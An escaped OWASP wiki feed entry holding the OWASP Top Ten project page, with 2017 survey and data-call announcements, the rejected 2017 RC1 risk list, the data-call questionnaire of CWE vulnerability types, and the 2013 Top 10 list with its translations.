        &amp;lt;!-- BEGIN of SubSubsectionExternalReferencesTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | myUnused =                      ERROR in the 'Language File' (Use of the unused Object)&lt;br /&gt;
        | #default =                      ERROR in the 'Language File' (Use of an unknown Object)&lt;br /&gt;
     }} &amp;lt;!-- End of English --&amp;gt;&lt;br /&gt;
}}&amp;lt;/onlyinclude&amp;gt;&lt;/div&gt;</summary>
		<author><name>Neil Smithline</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Top_Ten_Project&amp;diff=232040</id>
		<title>Category:OWASP Top Ten Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Top_Ten_Project&amp;diff=232040"/>
				<updated>2017-08-06T16:37:06Z</updated>
		
		<summary type="html">&lt;p&gt;Neil Smithline: updated translation tab&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:90px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File: flagship_big.jpg|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Flagship_Projects]]&amp;lt;/div&amp;gt;&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== OWASP Top 10 2017 - Industry survey open and data call reopened==&lt;br /&gt;
&lt;br /&gt;
* All industry professionals are encouraged to complete this [https://goo.gl/forms/ltbKrdYrp4Qdl7Df2 &amp;lt;u&amp;gt;survey for new vulnerability categories&amp;lt;/u&amp;gt;] to help determine up to two items in the 2017 Top 10. The deadline for the survey is &amp;lt;b&amp;gt;30 August, 2017&amp;lt;/b&amp;gt;.&lt;br /&gt;
* The data call for the 2017 Top 10 has been reopened. The  [https://goo.gl/forms/tLgyvK9O74r7wMkt2 &amp;lt;u&amp;gt;call for data&amp;lt;/u&amp;gt;] is now reopened to allow for additional data to be collected for analysis. The new deadline for the extended data call is &amp;lt;b&amp;gt;18 September, 2017&amp;lt;/b&amp;gt;.&lt;br /&gt;
This [https://owasp.blogspot.com/2017/08/owasp-top-10-2017-project-update.html &amp;lt;u&amp;gt;OWASP blog posting&amp;lt;/u&amp;gt;] describes the process in detail. &lt;br /&gt;
&lt;br /&gt;
==OWASP Top 10 2017 – RC1 rejected==&lt;br /&gt;
&lt;br /&gt;
During the [https://owaspsummit.org/website/ &amp;lt;u&amp;gt;OWASP Summit 2017&amp;lt;/u&amp;gt;], several sessions took place discussing many different aspects of the OWASP Top 10, for example, governance and validation, the data collection process, data assessment and review of the new suggested A7 and A10.&lt;br /&gt;
Main [https://owaspsummit.org/Outcomes/Owasp-Top-10-2017/Owasp-Top-10-2017.html &amp;lt;u&amp;gt;outcomes of the OWASP Summit&amp;lt;/u&amp;gt;] include:&lt;br /&gt;
* RC1 of the OWASP Top 10 2017 has been rejected&lt;br /&gt;
* A1, A2, A3, A4, A5, A6, A8, A9 have been left untouched by consensus view&lt;br /&gt;
* Requirement to choose two additional items (-&amp;gt; see OWASP Top 10 2017 - Industry survey open and data call reopened)&lt;br /&gt;
* Feedback on the mailing list has been moved to the [https://github.com/OWASP/Top10/issues &amp;lt;u&amp;gt;issues list&amp;lt;/u&amp;gt;] in GitHub, please continue to contribute feedback there. &lt;br /&gt;
* The new OWASP Top 10 2017 is to be released in late November 2017.&lt;br /&gt;
* New project leadership put in place.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- I think it makes sense just to delete this text - Neil Smithline&lt;br /&gt;
==OWASP Top 10 - 2017 Release Candidate ==&lt;br /&gt;
&lt;br /&gt;
The release candidate for public comment was published 10 April 2017 and can be [https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pdf downloaded here]. OWASP plans to release the final OWASP Top 10 - 2017 in July or August 2017 after a public comment period ending June 30, 2017.&lt;br /&gt;
&lt;br /&gt;
Constructive comments on this [https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pdf OWASP Top 10 - 2017 Release Candidate] should be forwarded via email to the [https://lists.owasp.org/mailman/listinfo/Owasp-topten OWASP Top 10 Project Email List]. Private comments may be sent to [mailto:vanderaj@owasp.org Andrew van der Stock]. Anonymous comments are welcome. All non-private comments will be catalogued and published at the same time as the final public release. Comments recommending changes to the Top 10 should include a complete suggested list of changes, along with a rationale for each change. All comments should indicate the specific relevant page and section.&lt;br /&gt;
&lt;br /&gt;
--&amp;gt;&lt;br /&gt;
==OWASP Top 10 Most Critical Web Application Security Risks==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list.&lt;br /&gt;
&lt;br /&gt;
We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications minimize these risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code.&lt;br /&gt;
&lt;br /&gt;
==Translation Efforts==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 has been translated to many different languages by numerous volunteers. These translations are available as follows:&lt;br /&gt;
&lt;br /&gt;
* [[Top10#OWASP_Top_10_for_2013 | All versions of the OWASP Top 10 - 2013]]&lt;br /&gt;
* [[Top10#OWASP_Top_10_for_2010 | All versions of the OWASP Top 10 - 2010]]&lt;br /&gt;
* [[Top10#Translation_Efforts_2 | Information about the various translation teams]]&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
The OWASP Top 10 is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license, so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
{{Social Media Links}}&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== What is the OWASP Top 10? ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 provides:&lt;br /&gt;
&lt;br /&gt;
* '''A list of the 10 Most Critical Web Application Security Risks'''&lt;br /&gt;
&lt;br /&gt;
For each Risk it provides:&lt;br /&gt;
* A description&lt;br /&gt;
* Example vulnerabilities&lt;br /&gt;
* Example attacks&lt;br /&gt;
* Guidance on how to avoid&lt;br /&gt;
* References to OWASP and other related resources&lt;br /&gt;
&lt;br /&gt;
== Project Leaders ==&lt;br /&gt;
&lt;br /&gt;
* [[User:vanderaj | Andrew van der Stock]]&lt;br /&gt;
* [[User:Neil_Smithline | Neil Smithline]]&lt;br /&gt;
* [[User:T.Gigler | Torsten Gigler]]&lt;br /&gt;
* [[User:Brianglas | Brian Glas (Data Analyst)]]&lt;br /&gt;
&lt;br /&gt;
== Related Projects ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Mobile_Security_Project#Top_Ten_Mobile_Risks | OWASP Mobile Top 10 Risks]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Top_Ten_Cheat_Sheet | OWASP Top 10 Cheat Sheet]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Proactive_Controls | Top 10 Proactive Controls]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Top_10/Mapping_to_WHID | OWASP Top 10 Mapped to the Web Hacking Incident Database]]&lt;br /&gt;
&lt;br /&gt;
== Ohloh ==&lt;br /&gt;
&lt;br /&gt;
*https://www.ohloh.net/p/OWASP-Top-10&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Quick Download ==&lt;br /&gt;
* [[Media:OWASP_Top_10_-_2013.pdf | OWASP Top 10 2013 - PDF]]&lt;br /&gt;
* [[Top_10_2013 | OWASP Top 10 2013 - wiki]]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Presentation.pptx OWASP Top 10 2013 Presentation - Covering Each Item in the Top 10 (PPTX)].&lt;br /&gt;
&lt;br /&gt;
== Get Involved ==&lt;br /&gt;
* [https://lists.owasp.org/mailman/listinfo/Owasp-topten Project Email List]&lt;br /&gt;
* [https://github.com/OWASP/Top10/issues Top 10 Issues on GitHub]&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
* [11 Jul 2017] OWASP Top 10 2017 – The appeal for data and opinions is still open&lt;br /&gt;
* [10 Apr 2017] OWAP Top 10 - 2017 Release Candidate Published&lt;br /&gt;
* [17 Dec 2016] OWASP Top 10 - 2017 Data Call Data Published&lt;br /&gt;
* [20 May 2016] OWASP Top 10 - 2017 Data Call Announced&lt;br /&gt;
* [12 Jun 2013] OWASP Top 10 - 2013 Final Released&lt;br /&gt;
* [Feb 2013] OWASP Top 10 - 2013 - Release Candidate Published&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-flagship-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Flagship_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_DOC.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2017 Release Candidate 1 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The 2017 OWASP Top 10 RC1 has been rejected. A [https://goo.gl/forms/ltbKrdYrp4Qdl7Df2 new survey for security professionals] and a [https://goo.gl/forms/tLgyvK9O74r7wMkt2 reopened data call] are now open. More details can be found on [https://owasp.blogspot.com/2017/08/owasp-top-10-2017-project-update.html this blog post]. &lt;br /&gt;
&lt;br /&gt;
The following text is now outdated and has been left strictly for historical purposes.&lt;br /&gt;
&lt;br /&gt;
==Historical/Outdated Information==&lt;br /&gt;
The release candidate for public comment was published 10 April 2017 and can be [https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pdf downloaded here.]. OWASP plans to release the final OWASP Top 10 - 2017 in July or August 2017 after a public comment period ending June 30, 2017.&lt;br /&gt;
&lt;br /&gt;
Constructive comments on this [https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pdf OWASP Top 10 - 2017 Release Candidate] should be forwarded via email to the [https://lists.owasp.org/mailman/listinfo/Owasp-topten OWASP Top 10 Project Email List]. Private comments may be sent to [mailto:vanderaj@owasp.org Andrew van der Stock]. Anonymous comments are welcome. All non-private comments will be catalogued and published at the same time as the final public release. Comments recommending changes to the Top 10 should include a complete suggested list of changes, along with a rationale for each change. All comments should indicate the specific relevant page and section.&lt;br /&gt;
&lt;br /&gt;
This release of the OWASP Top 10 marks this project’s fourteenth year of raising awareness of the importance of application security risks. This release follows the 2013 update, whose main change was the addition of 2013-A9 Use of Known Vulnerable Components. We are pleased to see that since the 2013 Top 10 release, a whole ecosystem of both free and commercial tools have emerged to help combat this problem as the use of open source components has continued to rapidly expand across practically every programming language. The data also suggests the use of known vulnerable components is still prevalent, but not as widespread as before. We believe the awareness of this issue the Top 10 - 2013 generated has contributed to both of these changes.&lt;br /&gt;
&lt;br /&gt;
We also noticed that since CSRF was introduced to the Top 10 in 2007, it has dropped from a widespread vulnerability to an uncommon one. Many frameworks include automatic CSRF defenses which has significantly contributed to its decline in prevalence, along with much higher awareness with developers that they must protect against such attacks.&lt;br /&gt;
&lt;br /&gt;
For 2017, the OWASP Top 10 Most Critical Web Application Security Risks (in the Release Candidate) are:&lt;br /&gt;
&lt;br /&gt;
* A1 Injection&lt;br /&gt;
* A2 Broken Authentication and Session Management&lt;br /&gt;
* A3 Cross-Site Scripting (XSS)&lt;br /&gt;
* A4 Broken Access Control (As it was in 2004)&lt;br /&gt;
* A5 Security Misconfiguration&lt;br /&gt;
* A6 Sensitive Data Exposure&lt;br /&gt;
* A7 Insufficient Attack Protection (NEW)&lt;br /&gt;
* A8 Cross-Site Request Forgery (CSRF)&lt;br /&gt;
* A9 Using Components with Known Vulnerabilities&lt;br /&gt;
* A10 Underprotected APIs (NEW)&lt;br /&gt;
&lt;br /&gt;
== 2017 Update Data Call Data ==&lt;br /&gt;
&lt;br /&gt;
DATA CALL RESULTS ARE NOW PUBLIC: The [https://github.com/OWASP/Top10/blob/master/2017/datacall/OWASP%20Top%2010%20-%202017%20Data%20Call-Public%20Release.xlsx?raw=true results of this data call have been made public here] as an Excel spreadsheet with 4 tabs. Three of the tabs have raw data as submitted, organized into three vulnerability data size categories: large, small, and none. A 4th tab includes some basic analysis of the large size submissions. The OWASP Top 10 project thanks all the submitters for their input to the OWASP Top 10 - 2017.&lt;br /&gt;
&lt;br /&gt;
On May 20, 2016, the Top 10 project made a public announcement of the data call for the 2017 update to the OWASP Top 10. Contributors filled out the Google form posted here:  [https://docs.google.com/forms/d/1sBMHN5nBicjr5xSo04xkdP5JlCnXFcKFCgEHjwPGuLw/viewform?c=0&amp;amp;w=1&amp;amp;usp=mail_form_link OWASP Top 10 - 2017 Data Call], which had the questions listed below.&lt;br /&gt;
&lt;br /&gt;
Page 1 of 5: Submitter Info&lt;br /&gt;
&lt;br /&gt;
* Name of Company/Organization *&lt;br /&gt;
* Company/Organization Web Site *&lt;br /&gt;
* Point of Contact Name *&lt;br /&gt;
* Point of Contact E-Mail *&lt;br /&gt;
&lt;br /&gt;
Page 2 of 5: Background on Applications&lt;br /&gt;
&lt;br /&gt;
* During what year(s) was this data collected? *&lt;br /&gt;
** 2014&lt;br /&gt;
** 2015&lt;br /&gt;
** Both 2014 &amp;amp; 2015&lt;br /&gt;
*** If the application vulnerability data you are submitting was extracted from a publicly available report, please provide a link to that report (or reports), and the relevant page number(s)&lt;br /&gt;
&lt;br /&gt;
* How many web applications do the submitted results cover? * We consider web apps, web services, and the server side of mobile apps to all be web apps.&lt;br /&gt;
&lt;br /&gt;
* What were the primary programming languages the applications you reviewed written in? Primary being 5% or more of the supplied results - Check all that apply&lt;br /&gt;
** Java&lt;br /&gt;
** .NET&lt;br /&gt;
** Python&lt;br /&gt;
** PHP&lt;br /&gt;
** Ruby&lt;br /&gt;
** Grails&lt;br /&gt;
** Play&lt;br /&gt;
** Node.js&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
* Please supply the exact percentage of applications per language checked off above:&lt;br /&gt;
&lt;br /&gt;
* What were the primary industries these applications supported? Primary being 5% or more of the supplied results - Check all that apply&lt;br /&gt;
** Financial&lt;br /&gt;
** Healthcare&lt;br /&gt;
** eCommerce&lt;br /&gt;
** Internet/Social Media&lt;br /&gt;
** Airline&lt;br /&gt;
** Energy&lt;br /&gt;
** Entertainment (Games/Music/Movies)&lt;br /&gt;
** Government&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
* Where in the world were the application owners primarily? Again - select those where 5% or more of your results came from&lt;br /&gt;
** North America&lt;br /&gt;
** Europe&lt;br /&gt;
** AsiaPac&lt;br /&gt;
** South America&lt;br /&gt;
** Middle East&lt;br /&gt;
** Africa&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
Page 3 of 5: Assessment Team and Detection Approach&lt;br /&gt;
&lt;br /&gt;
* What type of team did the bulk of this work? *&lt;br /&gt;
** Internal Assessment Team(s)&lt;br /&gt;
** Consulting Organization&lt;br /&gt;
** Product Vendor/Service Provider (e.g., SaaS)&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
*What type of analysis tools do they use? * Check all that apply.&lt;br /&gt;
** Free/Open Source Static Application Security Testing (SAST) Tools&lt;br /&gt;
** Free/Open Source Dynamic Application Security Testing (DAST) Tools&lt;br /&gt;
** Free/Open Source Interactive Application Security Testing (IAST) Tools&lt;br /&gt;
** Commercial Static Application Security Testing (SAST) Tools&lt;br /&gt;
** Commercial Dynamic Application Security Testing (DAST) Tools&lt;br /&gt;
** Commercial Interactive Application Security Testing (IAST) Tools&lt;br /&gt;
** Commercial DAST/IAST Hybrid Analysis Tools&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
* Which analysis tools do you frequently use? This includes both free, commercial, and custom (in house) tools - List tools by name&lt;br /&gt;
&lt;br /&gt;
* What is your primary assessment methodology? * Primary being the majority of your assessments follow this approach&lt;br /&gt;
** Raw (untriaged) output of automated analysis tool results using default rules&lt;br /&gt;
** Automated analysis tool results - with manual false positive analysis/elimination&lt;br /&gt;
** Output from manually tailored automated analysis tool(s)&lt;br /&gt;
** Output from manually tailored automated analysis tool(s) - with manual false positive analysis/elimination&lt;br /&gt;
** Manual expert penetration testing (Expected to be tool assisted w/ free DAST tool(s))&lt;br /&gt;
** Manual expert penetration testing with commercial DAST tool(s)&lt;br /&gt;
** Manual expert code review (Using IDE and other free code review aids)&lt;br /&gt;
** Manual expert code review with commercial SAST tool(s)&lt;br /&gt;
** Combined manual expert code review and penetration testing with only free tools&lt;br /&gt;
** Combined manual expert code review and penetration testing with only commercial tools&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
Page 4 of 5: Application Vulnerability Data&lt;br /&gt;
&lt;br /&gt;
Each question asks the number of vulnerabilities found for a particular type of vulnerability. At the end, is one catch all text question where you can add other types of vulnerabilities and their counts. If you prefer, just send your vulnerability data in a spreadsheet to brian.glas@owasp.org with these columns: CATEGORY NAME, CWE #, COUNT after you submit the rest of your input via this data call. ideally it would come from the email address you specified in the Point of Contact E-Mail question on Page 1 so its easy to correlate the two.&lt;br /&gt;
&lt;br /&gt;
* Number of SQL Injection Vulnerabilities Found (CWE-89)?&lt;br /&gt;
* Number of Hibernate Injection Vulnerabilities Found (CW-564)?&lt;br /&gt;
* Number of Command Injection Vulnerabilities Found (CWE-77)?&lt;br /&gt;
* Number of Authentication Vulnerabilities Found (CWE-287)?&lt;br /&gt;
* Number of Session Fixation Vulnerabilities Found (CWE-384)?&lt;br /&gt;
* Number of Cross-Site Scripting (XSS) Vulnerabilities Found (CWE-79)?&lt;br /&gt;
* Number of DOM-Based XSS Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of Insecure Direct Object Reference Vulnerabilities Found (CWE-639)?&lt;br /&gt;
* Number of Path Traversal Vulnerabilities Found (CWE-22)?&lt;br /&gt;
* Number of Missing Authorization Vulnerabilities Found (CWE-285)?&lt;br /&gt;
* Number of Security Misconfiguration Vulnerabilities Found (CWE-2)?&lt;br /&gt;
* Number of Cleartext Transmission of Sensitive Information Vulnerabilities Found (CWE-319)?&lt;br /&gt;
* Number of Cleartext Storage of Sensitive Information Vulnerabilities Found (CWE-312)?&lt;br /&gt;
* Number of Weak Encryption Vulnerabilities Found (CWE-326)?&lt;br /&gt;
* Number of Cryptographic Vulnerabilities Found (CWEs-310/326/327/etc)?&lt;br /&gt;
** You can report them all lumped together in 310 or in their individual categories. However you want.&lt;br /&gt;
* Number of Improper (Function Level) Access Control Vulnerabilities Found (CWE-285)?&lt;br /&gt;
* Number of Cross-Site Request Forgery (CSRF) Vulnerabilities Found (CWE-352)?&lt;br /&gt;
* Number of Use of Known Libraries Found (No CWE)?&lt;br /&gt;
* Number of Unchecked Redirect Vulnerabilities Found (CWE-601)?&lt;br /&gt;
* Number of Unvalidated Forward Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of Clickjacking Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of XML eXternal Entity Injection (XXE) Vulnerabilities Found (CWE-611)?&lt;br /&gt;
* Number of Server-Side Request Forgery (SSRF) Vulnerabilities Found (CWE-918)?&lt;br /&gt;
* Number of Denial of Service (DOS) Vulnerabilities Found (CWE-400)?&lt;br /&gt;
* Number of Expression Language Injection Vulnerabilities Found (CWE-917)?&lt;br /&gt;
* Number of Error Handling Vulnerabilities Found (CWE-388)?&lt;br /&gt;
* Number of Information Leakage/Disclosure Vulnerabilities Found (CWE-200)?&lt;br /&gt;
* Number of Insufficient Anti-automation Vulnerabilities Found (CWE-799)?&lt;br /&gt;
* Number of Insufficient Security Logging Vulnerabilities Found (CWE-778)?&lt;br /&gt;
* Number of Insufficient Intrusion Detection and Response Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of Mass Assignment Vulnerabilities Found (CWE-915)?&lt;br /&gt;
* What other vulnerabilities did you find?&lt;br /&gt;
** Please provide in this format: CATEGORY NAME, CWE #, COUNT (one line per category). Say &amp;quot;No CWE&amp;quot; if there isn't a CWE # for that category. If you plan to send all your vulnerability data in via an email, please state so here so we know to expect it.&lt;br /&gt;
&lt;br /&gt;
Page 5 of 5: Suggestions for the next OWASP Top 10&lt;br /&gt;
&lt;br /&gt;
What do you think we should change?&lt;br /&gt;
&lt;br /&gt;
* Vulnerability types you think should be added to the T10? Because they are an unappreciated risk, widespread, becoming more prevalent, a new type of vulnerability, etc.&lt;br /&gt;
* Vulnerability types you think should be removed from the T10?&lt;br /&gt;
* Suggested changes to the Top 10 Document/Wiki?&lt;br /&gt;
* Suggestions on how to improve this call for data?&lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 project is sponsored by {{MemberLinks|link=https://www.aspectsecurity.com|logo=Aspect_logo_owasp.jpg}}&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2013 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On June 12, 2013 the OWASP Top 10 for 2013 was officially released. This version was updated based on numerous comments received during the comment period after the release candidate was released in Feb. 2013.&lt;br /&gt;
&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013.pdf OWASP Top 10 2013 document (PDF)].&lt;br /&gt;
* [[Top_10_2013 | OWASP Top 10 2013 - Wiki.]]&lt;br /&gt;
* [https://www.owasp.org/images/6/6a/OWASP_TOP_10_2013_Arabic.pdf OWASP Top 10 2013 - Arabic (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/5/51/OWASP_Top_10_2013-Chinese-V1.2.pdf OWASP Top 10 2013 - Chinese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/f/f3/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pdf OWASP Top 10 2013 - Czech (PDF)].&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20French.pdf OWASP Top 10 2013 - French (PDF)].&lt;br /&gt;
* [[media:OWASP_Top_10_2013_DE_Version_1_0.pdf | OWASP Top 10 2013 - German (PDF)]] &lt;br /&gt;
* [[OWASP_Top10_Hebrew|OWASP Top 10 2013 - Hebrew]] [https://www.owasp.org/images/1/1b/OWASP_Top_10_2013-Hebrew.pdf (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/c/c9/OWASP_Top_10_-_2013_-_Italiano.pdf OWASP Top 10 2013 - Italian (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/7/79/OWASP_Top_10_2013_JPN.pdf OWASP Top 10 2013 - Japanese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/2/2c/OWASP_Top_10_-_2013_Final_-_Korean.pdf OWASP Top 10 2013 - Korea (PDF)].&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2013_Brazilian_Portuguese.pdf OWASP Top 10 2013 - Brazilian Portuguese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/5/5f/OWASP_Top_10_-_2013_Final_-_Espa%C3%B1ol.pdf OWASP Top 10 2013 - Spanish (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/e/e3/OWASP_Top_10_-_2013_Final_Ukrainian.pdf OWASP Top 10 2013 - Ukrainian (PDF)]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Presentation.pptx OWASP Top 10 2013 Presentation - Presenting Each Item in the Top 10 (PPTX)].&lt;br /&gt;
&lt;br /&gt;
For 2013, the OWASP Top 10 Most Critical Web Application Security Risks are:&lt;br /&gt;
&lt;br /&gt;
* [[Top_10_2013-A1-Injection | A1 Injection]]&lt;br /&gt;
* [[Top_10_2013-A2-Broken_Authentication_and_Session_Management | A2 Broken Authentication and Session Management]]&lt;br /&gt;
* [[Top_10_2013-A3-Cross-Site_Scripting_(XSS) | A3 Cross-Site Scripting (XSS)]]&lt;br /&gt;
* [[Top_10_2013-A4-Insecure_Direct_Object_References | A4 Insecure Direct Object References]]&lt;br /&gt;
* [[Top_10_2013-A5-Security_Misconfiguration | A5 Security Misconfiguration]]&lt;br /&gt;
* [[Top_10_2013-A6-Sensitive_Data_Exposure | A6 Sensitive Data Exposure]]&lt;br /&gt;
* [[Top_10_2013-A7-Missing_Function_Level_Access_Control | A7 Missing Function Level Access Control]]&lt;br /&gt;
* [[Top_10_2013-A8-Cross-Site_Request_Forgery_(CSRF) | A8 Cross-Site Request Forgery (CSRF)]]&lt;br /&gt;
* [[Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities | A9 Using Components with Known Vulnerabilities]]&lt;br /&gt;
* [[Top_10_2013-A10-Unvalidated_Redirects_and_Forwards | A10 Unvalidated Redirects and Forwards]]&lt;br /&gt;
&lt;br /&gt;
If you are interested, the methodology for how the Top 10 is produced is now documented here: [[Top_10_2013/ProjectMethodology | OWASP Top 10 Development Methodology]]&lt;br /&gt;
&lt;br /&gt;
Please help us make sure every developer in the ENTIRE WORLD knows about the OWASP Top 10 by helping to spread the word!!! &lt;br /&gt;
&lt;br /&gt;
As you help us spread the word, please emphasize: &lt;br /&gt;
&lt;br /&gt;
*OWASP is reaching out to developers, not just the application security community &lt;br /&gt;
*The Top 10 is about managing risk, not just avoiding vulnerabilities &lt;br /&gt;
*To manage these risks, organizations need an application risk management program, not just awareness training, app testing, and remediation&lt;br /&gt;
&lt;br /&gt;
We need to encourage organizations to get off the penetrate and patch mentality. As Jeff Williams said in his 2009 OWASP AppSec DC Keynote: “we’ll never hack our way secure – it’s going to take a culture change” for organizations to properly address application security.&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list. Versions of the 2007 and 2010 version were translated into English, French, Spanish, Japanese, Korean and Turkish and other languages. The 2013 version was translated into even more languages.&lt;br /&gt;
&lt;br /&gt;
We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications minimize these risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code.&lt;br /&gt;
&lt;br /&gt;
== Changes between 2010 and 2013 Editions ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 - 2013 includes the following changes as compared to the 2010 edition:&lt;br /&gt;
&lt;br /&gt;
* A1 Injection&lt;br /&gt;
* A2 Broken Authentication and Session Management (was formerly 2010-A3)&lt;br /&gt;
* A3 Cross-Site Scripting (XSS) (was formerly 2010-A2)&lt;br /&gt;
* A4 Insecure Direct Object References&lt;br /&gt;
* A5 Security Misconfiguration (was formerly 2010-A6)&lt;br /&gt;
* A6 Sensitive Data Exposure (2010-A7 Insecure Cryptographic Storage and 2010-A9 Insufficient Transport Layer Protection were merged to form 2013-A6)&lt;br /&gt;
* A7 Missing Function Level Access Control (renamed/broadened from 2010-A8 Failure to Restrict URL Access)&lt;br /&gt;
* A8 Cross-Site Request Forgery (CSRF) (was formerly 2010-A5)&lt;br /&gt;
* A9 Using Components with Known Vulnerabilities (new but was part of 2010-A6 – Security Misconfiguration)&lt;br /&gt;
* A10 Unvalidated Redirects and Forwards&lt;br /&gt;
&lt;br /&gt;
== Other 2013 Top 10 Docs ==&lt;br /&gt;
&lt;br /&gt;
